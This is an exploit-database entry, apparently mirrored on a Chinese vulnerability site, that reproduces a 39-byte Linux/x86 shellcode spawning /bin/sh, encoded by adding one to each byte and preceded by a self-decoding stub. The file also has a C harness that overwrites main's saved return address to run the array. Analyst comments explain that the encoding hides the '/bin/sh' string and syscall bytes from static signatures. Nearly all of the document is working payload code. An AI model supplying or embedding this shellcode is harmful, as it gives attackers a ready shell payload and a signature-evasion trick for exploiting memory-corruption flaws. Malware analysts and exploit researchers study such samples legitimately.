Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

漏洞ID 1055554 漏洞类型
发布时间 2006-01-25 更新时间 2006-01-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13384
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * (linux/x86) - execve("/bin/sh", ["/bin/sh"], NULL) / encoded by +1 - 39 bytes
 * - izik <izik@tty64.org>
 */

/*
 * Self-decoding byte sequence, 39 bytes in total. Notes for analysts:
 *
 * - The five push immediates carry the 20-byte payload with every byte
 *   incremented by one. The "/bin/sh" string and the `int $0x80` opcode
 *   bytes (cd 80) therefore never appear literally in this array, so a
 *   static signature keyed on them does not match the encoded form.
 * - The decoder stub (push $0x14 / pop %ecx / decb / dec / jns) is not
 *   encoded itself and is the invariant part of the sample.
 * - The stub ends with push %esp / ret, which moves execution to the
 *   decoded bytes on the stack. That fetch succeeds only where stack
 *   pages are mapped executable.
 * - Decoded, the stack bytes form the execve("/bin/sh") sequence named
 *   in the header comment of this file.
 */
char shellcode[] = 

	// Encoded payload, pushed last-dword-first so it ends up in order at %esp.
	"\x68\x8a\xe2\xce\x81"  // push $0x81cee28a 
	"\x68\xb1\x0c\x53\x54"  // push $0x54530cb1 
	"\x68\x6a\x6f\x8a\xe4"  // push $0xe48a6f6a 
	"\x68\x01\x69\x30\x63"  // push $0x63306901 
	"\x68\x69\x30\x74\x69"  // push $0x69743069 
	"\x6a\x14"              // push $0x14 
	"\x59"                  // pop %ecx  (ecx = 0x14, the starting byte index)
	
	//
	// <_unpack_loop>:
	//
	// Subtracts one from each byte at %esp+%ecx while %ecx counts from 0x14
	// down to 0. That is 21 bytes: the 20 pushed above plus the one byte
	// that already sat just above them on the stack.
	//

	"\xfe\x0c\x0c"          // decb (%esp,%ecx,1) 
	"\x49"                  // dec %ecx 
	"\x79\xfa"              // jns <_unpack_loop>  (exits once ecx goes negative)
	"\x41"                  // inc %ecx  (ecx: -1 -> 0)
	"\xf7\xe1"              // mul %ecx  (edx:eax = eax * 0, clearing both)
	"\x54"                  // push %esp  (address of the decoded bytes)
	"\xc3";                 // ret  (pops that address: execution continues on the stack)

/*
 * Test harness from the original post. It never calls shellcode[]; it
 * overwrites a stack slot near its own local so that returning from main
 * lands in the array. argc and argv are unused, and there is no return
 * statement.
 *
 * NOTE(review): this depends on several conditions the source does not
 * guarantee. It needs a 32-bit build in which int and pointers have the
 * same width, and a frame layout with no canary or padding between the
 * local and the saved return address. shellcode[] is a writable
 * file-scope array, so it is presumably placed in a data section; the
 * pages holding it and the stack must both be executable. Where data and
 * stack pages are non-executable, the first instruction fetch faults
 * instead.
 */
int main(int argc, char **argv) {
	int *ret;
	// Points two int-sized slots above the local `ret`. Presumably this is
	// main's saved return address under a classic x86 frame (local, saved
	// %ebp, return address). This is undefined behaviour in C and depends
	// on the compiler; confirm against the actual build.
	ret = (int *)&ret + 2;
	// Stores the address of shellcode[] in that slot. The (int) cast
	// truncates the pointer wherever pointers are wider than int.
	(*ret) = (int) shellcode;
}

// milw0rm.com [2006-01-25]